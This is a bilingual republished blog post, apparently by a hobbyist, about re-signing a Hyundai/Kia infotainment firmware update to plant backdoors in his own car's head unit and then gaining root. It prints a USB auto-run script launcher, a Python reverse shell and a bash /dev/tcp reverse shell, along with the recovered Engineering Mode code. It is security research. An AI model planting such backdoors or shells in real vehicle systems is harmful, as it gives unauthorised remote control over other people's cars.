How I Hacked my Car Part 2: Making a Backdoor

汽车安全 2个月前 admin

25 0 0

Note: As of 2022/10/25 the information in this series is slightly outdated. See Part 5 for more up to date information.
注意：截至 2022 年 10 月 25 日，本系列中的信息略有过时。有关更多最新信息，请参阅第 5 部分。

If you haven’t read Part 1 please do so.
如果您还没有阅读第 1 部分，请阅读。

No More Waiting
不再等待 ⌗

On April 28, 2022 a new round of Display Audio firmware updates was released for Hyundai and Kia vehicles. Luckily, it included my car.
2022 年 4 月 28 日，现代和起亚汽车发布了新一轮的 Display Audio 固件更新。幸运的是，它包括我的车。 How I Hacked my Car Part 2: Making a Backdoor

I wasted no time in developing my own firmware update with a backdoor.
我没有浪费时间使用后门开发自己的固件更新。

Firmware Security 固件安全 ⌗

Through the linux_envsetup.sh script I learned exactly how a D-Audio2V encrypted firmware update is made:
通过linux_envsetup.sh脚本，我确切地了解了 D-Audio2V 加密固件更新是如何进行的：

First, all of the various binary files are sorted into the correct directories. (Micom updates go in the micom folder, system image goes in the system folder, etc.)
首先，将所有不同的二进制文件分类到正确的目录中。（Micom 更新位于 micom 文件夹中，系统映像进入系统文件夹等）
A hash is calculated of every binary file in the update using repeated SHA224, these hashes are put into an update.cfg file. With each line containing the original name of the file, a colon, and then the file’s hash. update.cfg File
使用重复的 SHA224 计算更新中每个二进制文件的哈希值，这些哈希值被放入 update.cfg 文件中。每行都包含文件的原始名称、冒号，然后是文件的哈希值。update.cfg 文件
Certain files are encrypted using the AES test key, these files are renamed to “enc_{OriginalName}”.
某些文件使用 AES 测试密钥进行加密，这些文件将重命名为“enc_{OriginalName}”。
The update.cfg file is hashed using the same method as the other files and then the hash is signed. The signed hash is put into the update.info file.
update.cfg 文件使用与其他文件相同的方法进行哈希处理，然后对哈希进行签名。签名的哈希值将放入 update.info 文件中。
All of the binaries, the update.cfg file, and the update.info file is zipped up into an encrypted zip.
所有二进制文件、update.cfg 文件和 update.info 文件都压缩到加密的 zip 中。

Bash Scripts are Neat
Bash 脚本很整洁 ⌗

I knew all of the security measures for the firwmare updates. So now I just needed to follow them to create my own firmware update. In order to help me do this, I created a couple of bash scripts.
我知道 firwmare 更新的所有安全措施。所以现在我只需要按照他们来创建我自己的固件更新。为了帮助我做到这一点，我创建了几个 bash 脚本。

How I Hacked my Car Part 2: Making a Backdoor

I created an empty folder and put the scripts and the firmware file I wanted to edit in it, then I used the “setup_environment.sh” script to setup the folder/file structure.
我创建了一个空文件夹，并将要编辑的脚本和固件文件放入其中，然后使用“setup_environment.sh”脚本设置文件夹/文件结构。 How I Hacked my Car Part 2: Making a Backdoor

I then edited the files in the keys folder, filling them in with the information I found from Mobis’s Open Source Code and by googling (See Part 1).
然后，我编辑了 keys 文件夹中的文件，用我从 Mobis 的开源代码和谷歌搜索中找到的信息填充它们（参见第 1 部分）。

Then I ran the extract_update.sh file, passing in my original firmware file.
然后我运行了extract_update.sh文件，传入了我的原始固件文件。 How I Hacked my Car Part 2: Making a Backdoor

This extracted the firmware file using the zip password and mounts the system image to the system_image folder.
这将使用 zip 密码提取固件文件，并将系统映像装载到 system_image 文件夹。 How I Hacked my Car Part 2: Making a Backdoor

Now I could modify the system image in any way I wanted.
现在，我可以随心所欲地修改系统映像。

The Backdoors 后门 ⌗

I decided to make as minimal of a change as possible, at least at first. During my reverse engineering and research process I compared an older firmware update to one that released for my vehicle. In it I found a new bash script that runs Guider, a Python-based performance analyzer tool.
我决定尽可能少地改变，至少在一开始是这样。在我的逆向工程和研究过程中，我将较旧的固件更新与为我的车辆发布的固件更新进行了比较。在其中，我发现了一个新的 bash 脚本，它运行 Guider，一个基于 Python 的性能分析器工具。 How I Hacked my Car Part 2: Making a Backdoor

While reverse engineering the new Engineering Mode app I saw that there was a menu option to run this script. I found my target for the backdoor. I decided to add in two backdoors into the Guider launching script.
在对新的工程模式应用程序进行逆向工程时，我看到有一个菜单选项可以运行此脚本。我找到了后门的目标。我决定在 Guider 启动脚本中添加两个后门。

echo "Finding USB Script"
USB_SCRIPT_PATH=$(find /run/media/ -path "*1C207FCE3065.sh" 2>/dev/null)

if [ -n "$USB_SCRIPT_PATH" ]
then
	echo "Running USB Script"
	USB_SCRIPT_CONTENT=$(cat $USB_SCRIPT_PATH)
	bash -c "$USB_SCRIPT_CONTENT" &
fi

 echo "Prescript Running"
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.2",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())' 2>/dev/null &

The first backdoor was a USB script launcher that would search and launch a script file called “1C207FCE3065.sh” on any flash drive inserted into the system. The second backdoor was a simple python reverse shell that would attempt to connect to “192.168.0.2” which would be my phone or laptop when connected over Wi-Fi.
第一个后门是一个USB脚本启动器，它将在插入系统的任何闪存驱动器上搜索并启动名为“1C207FCE3065.sh”的脚本文件。第二个后门是一个简单的 python 反向 shell，它会尝试连接到“192.168.0.2”，当通过 Wi-Fi 连接时，这将是我的手机或笔记本电脑。

Making the New Image
制作新形象 ⌗

Once my backdoor was in place I ran the compile_update.sh script. It:
一旦我的后门到位，我就运行了compile_update.sh脚本。它：

Unmounts the system image
卸载系统映像
Calculates the new hash for the system.img file
计算 system.img 文件的新哈希值
Updates the update.cfg with the new system.img hash
使用新的 system.img 哈希更新 update.cfg
Calculates the hash of the update.cfg file
计算 update.cfg 文件的哈希值
Signs the update.cfg file, putting it into update.list.
对 update.cfg 文件进行签名，并将其放入 update.list 中。
Zips everything up into a zip file with the zip password from the settings.
使用设置中的 zip 密码将所有内容压缩到 zip 文件中。

How I Hacked my Car Part 2: Making a Backdoor

Tada~ I now had a system update that contained my backdoors. I was a bit lazy and did not make the output zip auto-rename to have a valid version in it, so you have to copy the name of the original update to it.
Tada~ 我现在有一个包含我的后门的系统更新。我有点懒惰，没有使输出 zip 自动重命名以包含有效版本，因此您必须将原始更新的名称复制到其中。

How I Hacked my Car Part 2: Making a Backdoor

I put my new firmware update on my flash drive, went into the settings app on the IVI and pressed Update.
我将新的固件更新放在闪存驱动器上，进入 IVI 上的设置应用程序并按更新。

It Worked? 成功了？⌗

The first time I did this, it actually did not work. I had a bug in my script which updated the update.cfg file with an invalid hash. This lead to the system rebooting repeadedly into recovery mode, trying the update, checking the hashes, failing, rebooting… I was able to get out of the cycle though by using a paperclip to press the reset button on the front of the IVI.
我第一次这样做，它实际上不起作用。我的脚本中有一个错误，它用无效的哈希更新了update.cfg文件。这会导致系统重新引导进入恢复模式、尝试更新、检查哈希、失败、重新启动……不过，我能够通过使用回形针按下 IVI 正面的重置按钮来摆脱循环。

Ok, now it Worked
好的，现在它工作了⌗

After I fixed my scripts and made a new system update file, I loaded it on my USB drive, pressed Update and… It worked! The update did take a while, but after the update screen went past the first step I was pretty sure I was in the clear.
在我修复脚本并制作新的系统更新文件后，我将其加载到我的 USB 驱动器上，按更新并…成功了！更新确实花了一段时间，但是在更新屏幕通过第一步之后，我很确定我是清楚的。

The system eventually rebooted, and everything appeared to be fully working. Now I just had to access it using my new backdoor. Going Through the Backdoor
系统最终重新启动，一切似乎都在完全工作。现在我只需要使用我的新后门访问它。通过后门

I set my phone up with wireless Android Auto and dumped the logs to my flash drive to recover the Wi-Fi password. After disconnecting my phone I connected my laptop to the Wi-Fi and set my ip address to: 192.168.0.2. I then used ncat to listen in on port 4242 using the following command:
我使用无线 Android Auto 设置了我的手机，并将日志转储到我的闪存驱动器以恢复 Wi-Fi 密码。断开手机连接后，我将笔记本电脑连接到Wi-Fi，并将IP地址设置为：192.168.0.2。然后，我使用ncat使用以下命令监听端口4242：

ncat -l -p 4242

Now all I had to do was run Guider in the Engineering Mode. I went into the settings screen, tapped 10 times to the left of the Update button and once to the right of the Update button, put in the code 2400 and…
现在我所要做的就是在工程模式下运行 Guider。我进入设置屏幕，在“更新”按钮的左侧点击了 10 次，在“更新”按钮的右侧点击了一次，输入代码 2400 并… How I Hacked my Car Part 2: Making a Backdoor

The Engineering Mode code didn’t work? Mobis must have had changed the code. Luckily, I knew that the Engineering Mode app logs (or at least it used to log) the hash of the correct code to the Logcat log. So I quickly dumped the log to my drive again and looked through it.
工程模式代码不起作用？摩比斯一定更改了代码。幸运的是，我知道工程模式应用程序会将正确代码的哈希记录（或至少用于记录）到 Logcat 日志。因此，我迅速将日志再次转储到我的驱动器中并查看了它。

Looking through the logs, I saw a couple of entries related to the Engineering Mode Password Display. There were three MD5 hashes printed out.
查看日志，我看到了几个与工程模式密码显示相关的条目。打印出三个 MD5 哈希值。 How I Hacked my Car Part 2: Making a Backdoor

md5Year was the hash of the string “02”
md5Year 是字符串“02”的哈希值
md5Password1 was the hash of the string “24”
md5Password1 是字符串“24”的哈希值
md5Password2 was the hash of the string “00”
md5Password2 是字符串“00”的哈希值

So it appeared md5Password(n) was each two digits of the code I entered, and md5Year might be derived from the year and be two digits of the real code it expected.
因此，md5Password（n）似乎是我输入的代码的每个两位数字，而 md5Year 可能是从年份派生的，并且是它预期的真实代码的两位数字。

But if that is true I was missing two digits since the app requires a 4 digit code, so I went back to reverse engineering the Engineering Mode app.
但如果这是真的，我缺少两位数，因为该应用程序需要 4 位代码，所以我回去对工程模式应用程序进行逆向工程。

I found the function used to check the code and saw a constant string that contained a hash. Looking up the hash revealed it was for “38”.
我找到了用于检查代码的函数，并看到了一个包含哈希值的常量字符串。查找哈希值显示它是“38”。 How I Hacked my Car Part 2: Making a Backdoor

Based on the rest of the function it looked like the md5Year value and “38” might be the two parts I needed, so I went to my car to try them.
根据功能的其余部分，它看起来像 md5Year 值和“38”可能是我需要的两个部分，所以我去我的车上尝试了它们。

How I Hacked my Car Part 2: Making a Backdoor

After I entered the code “3802” I got a new scary popup:
在我输入代码“3802”后，我收到了一个新的可怕的弹出窗口： How I Hacked my Car Part 2: Making a Backdoor

Looks like Mobis added a new warning screen when entering the Engineering Mode.
看起来摩比斯在进入工程模式时添加了一个新的警告屏幕。

Now all I had to do was start Guider to activate my backdoor. I navigated to the Guider screen, pressed the “Start” button, and waited for the Python reverse shell to connect.
现在我所要做的就是启动 Guider 来激活我的后门。我导航到 Guider 屏幕，按下“开始”按钮，然后等待 Python 反向 shell 连接。 How I Hacked my Car Part 2: Making a Backdoor

Nada. 纳达。

The Python reverse shell was not working. I didn’t really look too much into why, since I had a very convienent backup: The USB Script Runner™.
Python 反向 shell 不起作用。我并没有过多地研究原因，因为我有一个非常方便的备份：USB Script Runner™。

The Backup Plan
备份计划 ⌗

Luckily, I still had my USB Script Runner™ part of the backdoor.
幸运的是，我的 USB Script Runner™ 部分仍然在后门中。

echo "Finding USB Script"
USB_SCRIPT_PATH=$(find /run/media/ -path "*1C207FCE3065.sh" 2>/dev/null)

if [ -n "$USB_SCRIPT_PATH" ]
then
	echo "Running USB Script"
	USB_SCRIPT_CONTENT=$(cat $USB_SCRIPT_PATH)
	bash -c "$USB_SCRIPT_CONTENT" &
fi

If that worked I could still have full access to the system. I saved a basic bash reverse shell script into the 1C207FCE3065.sh file on the root of my flash drive:
如果这可行，我仍然可以完全访问系统。我将一个基本的 bash 反向 shell 脚本保存到闪存驱动器根目录下的 1C207FCE3065.sh 文件中：

/bin/bash -i >& /dev/tcp/192.168.0.3/4242 0>&1 &

Once this script runs it should connect to my laptop’s auto-assigned IP address (192.168.0.3) and forward an interactive bash shell to ncat on port 4242.
此脚本运行后，它应该连接到我的笔记本电脑自动分配的 IP 地址（192.168.0.3），并在端口 4242 上将交互式 bash shell 转发到 ncat。

I simply plugged the USB in, pressed “Start Guider” again and…
我只需插入 USB，再次按下“Start Guider”，然后…… How I Hacked my Car Part 2: Making a Backdoor

I’m In 我在 ⌗

I had my backdoor access into the system. I ran whoami to see what user I was running as:
我有后门访问系统。我运行了 whoami 以查看我以哪个用户的身份运行： How I Hacked my Car Part 2: Making a Backdoor

I had my full root access. The first thing I did was collect some info, I output a full directory listing, netstat command output, df output, and more to my drive.
我有完全的root访问权限。我做的第一件事是收集一些信息，我将完整的目录列表、netstat 命令输出、df 输出等输出到我的驱动器。

Since I now had theoretical total control over my IVI, I thought the next logical step would be to create some apps for it.
由于我现在理论上可以完全控制我的 IVI，我认为下一个合乎逻辑的步骤是为它创建一些应用程序。